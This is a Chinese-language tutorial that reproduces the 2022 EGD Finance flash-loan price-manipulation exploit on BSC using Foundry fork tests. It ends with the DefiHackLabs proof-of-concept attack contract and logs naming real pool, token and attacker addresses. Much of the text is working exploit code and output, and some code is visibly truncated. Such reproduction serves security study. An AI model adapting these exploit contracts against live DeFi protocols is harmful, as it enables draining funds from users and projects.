


foundry的介绍可见:编写测试 - Foundry 中文文档 (

参考链接:EGD Finance 价格操纵攻击事件分析 - YINHUI’s BLOG (

1. 前情提要以及思路介绍

EGD-Finance项目的主要实现目的:质押USDT一段事件,可提取奖励EGD Token,前文已经说明,由于闪电贷从Pancake LPs池子中借出了大量的USDT,而奖励的EGD Token数量一定程度上依赖于池子中两种代币的数量,从而导致了价格操纵攻击。



  • 借用闪电贷,实现价格的操纵
  • 实现EGD项目的逻辑,质押后兑换奖励
  • 闪电贷实现价格操纵,利用EGD兑换的逻辑漏洞,实现套利

2. 闪电贷实现价格操纵

  • 对于想调用的外部合约函数,不仅仅需要它的地址,同时把对应需要调用的函数写成接口interface()的形式,interface()中不写具体的函数代码,函数访问修饰都是external.
  • solidity中没有浮点型的数,一般乘以的百分比,可以学习一下一般怎么写的
pragma solidity ^0.8.10;

import "forge-std/Test.sol";

interface IERC20 {
    function balanceOf(address owner) external view returns (uint256);
    function approve(address spender, uint256 value) external returns (bool);
    function transfer(address to, uint256 value) external returns (bool);

interface IEGD_Finance {
    function getEGDPrice() external view returns (uint);

interface IPancakePair {
    function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data) external;

address constant EGD_USDT_LPPool = 0xa361433E409Adac1f87CDF133127585F8a93c67d;

// EGD 代理合约的地址
address constant EGD_Finance = 0x34Bd6Dba456Bc31c2b3393e499fa10bED32a9370;

// USDT代币的地址
address constant usdt = 0x55d398326f99059fF775485246999027B3197955;

contract pricemanipulation is Test{

    function setUp() public{
    	//fork stake()函数调用前的状态
        vm.createSelectFork("", 20_245_522);
        deal(address(usdt),address(this), 30000*1 ether);

    function testPrice() public {
        console.log("EGD Price before:", IEGD_Finance(EGD_Finance).getEGDPrice());
        uint amount = IERC20(usdt).balanceOf(address(EGD_USDT_LPPool)) * 9_999_999_925 / 10_000_000_000;
        IPancakePair(EGD_USDT_LPPool).swap(0, amount, address(this), "0x00");
        console.log("EGD Price after( return flashloan )", IEGD_Finance(EGD_Finance).getEGDPrice());

    function pancakeCall(address sender, uint256 amount1, uint256 amount2, bytes calldata data) public {
        console.log("EGD Price after( flashloan )", IEGD_Finance(EGD_Finance).getEGDPrice()) ;
        bool success = IERC20(usdt).transfer(address(EGD_USDT_LPPool),(amount2 * 10_500_000_000) / 10_000_000_000) ;
        require(success) ;


 /test/attack_test # forge test --match-contract pricemanipulation -vvv
[⠃] Compiling...
No files changed, compilation skipped

Running 1 test for test/test_pricemanipulation.sol:pricemanipulation
[PASS] testPrice() (gas: 87598)
  EGD Price before: 8093644493314726
  EGD Price after( flashloan ) 60702333
  EGD Price after( return flashloan ) 8498326714945346

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 576.95ms
Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)

3. 实现先质押USDT,后获得EGD奖励

  • 这里比较疑惑的一点是,目标函数中userInfo是一个结构体映射,这里接口中将其用函数表示出,用于获取对应的值,希望有佬帮忙讲解一下,这里是interface的用法可以这样写嘛,后续再试一下。
pragma solidity ^0.8.10;

import "forge-std/Test.sol";

interface IERC20 {
    function balanceOf(address owner) external view returns (uint256);
    function approve(address spender, uint256 value) external returns (bool);
    function transfer(address to, uint256 value) external returns (bool);

interface IEGD_Finance {
    function getEGDPrice() external view returns (uint);
    function bond(address invitor) external;
    function stake(uint amount) external;
    function claimAllReward() external;
    function calculateAll(address addr) external view returns (uint);
    function calculateReward(address addr, uint slot) external view returns (uint);

    function userInfo(address) external view returns (        
        uint totalAmount,
        uint totalClaimed,
        address invitor,
        bool isRefer,
        uint refer,
        uint referReward

// EGD 代理合约的地址
address constant EGD_Finance = 0x34Bd6Dba456Bc31c2b3393e499fa10bED32a9370;

// USDT代币的地址
address constant usdt = 0x55d398326f99059fF775485246999027B3197955;

// EGD代币的地址
address constant egd = 0x202b233735bF743FA31abb8f71e641970161bF98;

contract stake_reward is Test{

    function setUp() public {
        vm.createSelectFork("", 20_245_522);
        deal(address(usdt),address(this), 30000*1 ether);

    function test_stake() public {
        IERC20(usdt).approve(address(EGD_Finance), 100 ether);
        IEGD_Finance(EGD_Finance).stake(100 ether);
        (uint totalAmount, , , , , ) = IEGD_Finance(EGD_Finance).userInfo(address(this));

        console.log("Stake USDT amount:", totalAmount);
        console.log("EGD reward: ", IERC20(egd).balanceOf(address(this)));

		// foundry的cheatcode,跳转到某个区块
        vm.warp(block.timestamp + (4 * 60 * 24 * 4));

        console.log("EGD reward after 2 days: ", IERC20(egd).balanceOf(address(this)));

/test/attack_test # forge test --match-contract stake_reward -vvv
[⠊] Compiling...
[⠰] Compiling 1 files with 0.8.22
[⠒] Solc 0.8.22 finished in 1.28s
Compiler run successful!

Running 1 test for test/test_stake_reward.sol:stake_reward
[PASS] test_stake() (gas: 865865)
  Stake USDT amount: 100000000000000000000
  EGD reward:  0
  EGD reward after 4 days:  18016435864263240000

Test result: ok. 1 passed; 0 failed; 0 skipped; finished in 591.56ms
Ran 1 test suites: 1 tests passed, 0 failed, 0 skipped (1 total tests)


4. 闪电贷实现价格操纵,利用EGD兑换的逻辑漏洞,实现套利

  • 只是简单地将上述两个步骤糅合在了一起,调用EGD-Finance提取奖励的函数
pragma solidity ^0.8.10;

import "forge-std/Test.sol";

interface IERC20 {
    function balanceOf(address owner) external view returns (uint256);
    function approve(address spender, uint256 value) external returns (bool);
    function transfer(address to, uint256 value) external returns (bool);

interface IEGD_Finance {
    function getEGDPrice() external view returns (uint);
    function bond(address invitor) external;
    function stake(uint amount) external;
    function claimAllReward() external;
    function calculateAll(address addr) external view returns (uint);
    function calculateReward(address addr, uint slot) external view returns (uint);
    function userInfo(address) external view returns (        
        uint totalAmount,
        uint totalClaimed,
        address invitor,
        bool isRefer,
        uint refer,
        uint referReward

interface IPancakePair {
    function swap(uint256 amount0Out, uint256 amount1Out, address to, bytes calldata data) external;

address constant EGD_USDT_LPPool = 0xa361433E409Adac1f87CDF133127585F8a93c67d;

// EGD 代理合约的地址
address constant EGD_Finance = 0x34Bd6Dba456Bc31c2b3393e499fa10bED32a9370;

// USDT代币的地址
address constant usdt = 0x55d398326f99059fF775485246999027B3197955;

// EGD代币的地址
address constant egd = 0x202b233735bF743FA31abb8f71e641970161bF98;

contract HackerTest is Test{

    function setUp() public{
        vm.createSelectFork("", 20_245_522);
        deal(address(usdt),address(this), 30000*1 ether);

    function stake() public {

        IERC20(usdt).approve(address(EGD_Finance), 100 ether);
        IEGD_Finance(EGD_Finance).stake(100 ether);

    function test_exploit() public {
        vm.warp(block.timestamp + (4 * 60 * 24 * 2));

        console.log("EGD Price before flashloan:", IEGD_Finance(EGD_Finance).getEGDPrice());
        uint totalreward = IEGD_Finance(EGD_Finance).calculateAll(address(this));
        console.log("Normal EGD reward:", totalreward);

        uint amount = IERC20(usdt).balanceOf(address(EGD_USDT_LPPool)) * 9_999_000_000 / 10_000_000_000;
        IPancakePair(EGD_USDT_LPPool).swap(0, amount, address(this), "0x00");


    function pancakeCall(address sender, uint256 amount1, uint256 amount2, bytes calldata data) public{

        console.log("EGD Price after flashloan: ", IEGD_Finance(EGD_Finance).getEGDPrice());

        console.log("Hacker's EGD balance: ", IERC20(egd).balanceOf(address(this)));

        bool success = IERC20(usdt).transfer(address(EGD_USDT_LPPool),(amount2 * 10_500_000_000) / 10_000_000_000) ;
        require(success) ;

5. DefiHacklabs实现的POC介绍

  • Defihacklabs中的复现,其将大部分常用的interface都保存在了./interface.sol文件中
  • 多了一步,是通过IPancakeRouter这个池子,将套利获得的EGD全部换成USDT,前文分析中已经说明
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;

import "forge-std/Test.sol";
import "./interface.sol";

// @KeyInfo - Total Lost : ~36,044 US$
// Attacker : 0xee0221d76504aec40f63ad7e36855eebf5ea5edd
// Attack Contract : 0xc30808d9373093fbfcec9e026457c6a9dab706a7
// Vulnerable Contract : 0x34bd6dba456bc31c2b3393e499fa10bed32a9370 (Proxy)
// Vulnerable Contract : 0x93c175439726797dcee24d08e4ac9164e88e7aee (Logic)
// Attack Tx :

// @Info
// Vulnerable Contract Code :
// Stake Tx :

// @Analysis
// Blocksec :
// PeckShield :

IPancakePair constant USDT_WBNB_LPPool = IPancakePair(0x16b9a82891338f9bA80E2D6970FddA79D1eb0daE);
IPancakePair constant EGD_USDT_LPPool = IPancakePair(0xa361433E409Adac1f87CDF133127585F8a93c67d);
IPancakeRouter constant pancakeRouter = IPancakeRouter(payable(0x10ED43C718714eb63d5aA57B78B54704E256024E));
address constant EGD_Finance = 0x34Bd6Dba456Bc31c2b3393e499fa10bED32a9370;
address constant usdt = 0x55d398326f99059fF775485246999027B3197955;
address constant egd = 0x202b233735bF743FA31abb8f71e641970161bF98;

contract Attacker is Test {
    function setUp() public {
        vm.createSelectFork("bsc", 20_245_522);

        vm.label(address(USDT_WBNB_LPPool), "USDT_WBNB_LPPool");
        vm.label(address(EGD_USDT_LPPool), "EGD_USDT_LPPool");
        vm.label(address(pancakeRouter), "pancakeRouter");
        vm.label(EGD_Finance, "EGD_Finance");
        vm.label(usdt, "USDT");
        vm.label(egd, "EGD");

    function testExploit() public {
        Exploit exploit = new Exploit();

        console.log("--------------------  Pre-work, stake 100 USDT to EGD Finance --------------------");
        console.log("Tx: 0x4a66d01a017158ff38d6a88db98ba78435c606be57ca6df36033db4d9514f9f8");
        console.log("Attacker Stake 100 USDT to EGD Finance");

        vm.warp(1_659_914_146); // block.timestamp = 2022-08-07 23:15:46(UTC)

        console.log("-------------------------------- Start Exploit ----------------------------------");
        emit log_named_decimal_uint("[Start] Attacker USDT Balance", IERC20(usdt).balanceOf(address(this)), 18);
        emit log_named_decimal_uint(
            "[INFO] EGD/USDT Price before price manipulation", IEGD_Finance(EGD_Finance).getEGDPrice(), 18
        emit log_named_decimal_uint(
            "[INFO] Current earned reward (EGD token)", IEGD_Finance(EGD_Finance).calculateAll(address(exploit)), 18
        console.log("Attacker manipulating price oracle of EGD Finance...");


        console.log("-------------------------------- End Exploit ----------------------------------");
        emit log_named_decimal_uint("[End] Attacker USDT Balance", IERC20(usdt).balanceOf(address(this)), 18);

// Contract 0x93c175439726797dcee24d08e4ac9164e88e7aee 
contract Exploit is Test {
    uint256 borrow1;
    uint256 borrow2;

    function stake() public {
        // Give exploit contract 100 USDT, 给账户初始复制
        deal(address(usdt), address(this), 100 ether);
        // Set invitor
        // Stake 100 USDT
        IERC20(usdt).approve(EGD_Finance, 100 ether);
        IEGD_Finance(EGD_Finance).stake(100 ether);

    function harvest() public {
        console.log("Flashloan[1] : borrow 2,000 USDT from USDT/WBNB LPPool reserve");
        borrow1 = 2000 * 1e18;
        USDT_WBNB_LPPool.swap(borrow1, 0, address(this), "0000");
        console.log("Flashloan[1] payback success");
        IERC20(usdt).transfer(msg.sender, IERC20(usdt).balanceOf(address(this))); // refund all USDT
    function pancakeCall(address sender, uint256 amount0, uint256 amount1, bytes calldata data) public {
        if (keccak256(data) == keccak256("0000")) {
            console.log("Flashloan[1] received");

            console.log("Flashloan[2] : borrow 99.99999925% USDT of EGD/USDT LPPool reserve");
            borrow2 = IERC20(usdt).balanceOf(address(EGD_USDT_LPPool)) * 9_999_999_925 / 10_000_000_000; // Attacker borrows 99.99999925% USDT of EGD_USDT_LPPool reserve
            EGD_USDT_LPPool.swap(0, borrow2, address(this), "00");
            console.log("Flashloan[2] payback success");

            // Swap all egd -> usdt
            console.log("Swap the profit...");
            address[] memory path = new address[](2);
            path[0] = egd;
            path[1] = usdt;
            IERC20(egd).approve(address(pancakeRouter), type(uint256).max);
                IERC20(egd).balanceOf(address(this)), 1, path, address(this), block.timestamp

            bool suc = IERC20(usdt).transfer(address(USDT_WBNB_LPPool), 2010 * 1e18); // Pancakeswap fee is 0.25%, so attacker needs to pay back usdt >2000/0.9975 (Cannot be exactly 0.25%)
            require(suc, "Flashloan[1] payback failed");
        } else {
            console.log("Flashloan[2] received");
            emit log_named_decimal_uint(
                "[INFO] EGD/USDT Price after price manipulation", IEGD_Finance(EGD_Finance).getEGDPrice(), 18
            // -----------------------------------------------------------------
            console.log("Claim all EGD Token reward from EGD Finance contract");
            emit log_named_decimal_uint("[INFO] Get reward (EGD token)", IERC20(egd).balanceOf(address(this)), 18);
            // -----------------------------------------------------------------
            uint256 swapfee = (amount1 * 10_000 / 9970) - amount1; // Attacker needs to pay >0.25% fee back to Pancakeswap
            bool suc = IERC20(usdt).transfer(address(EGD_USDT_LPPool), amount1 + swapfee);
            require(suc, "Flashloan[2] payback failed");

// interface
interface IEGD_Finance {
    function bond(address invitor) external;
    function stake(uint256 amount) external;
    function calculateAll(address addr) external view returns (uint256);
    function claimAllReward() external;
    function getEGDPrice() external view returns (uint256);
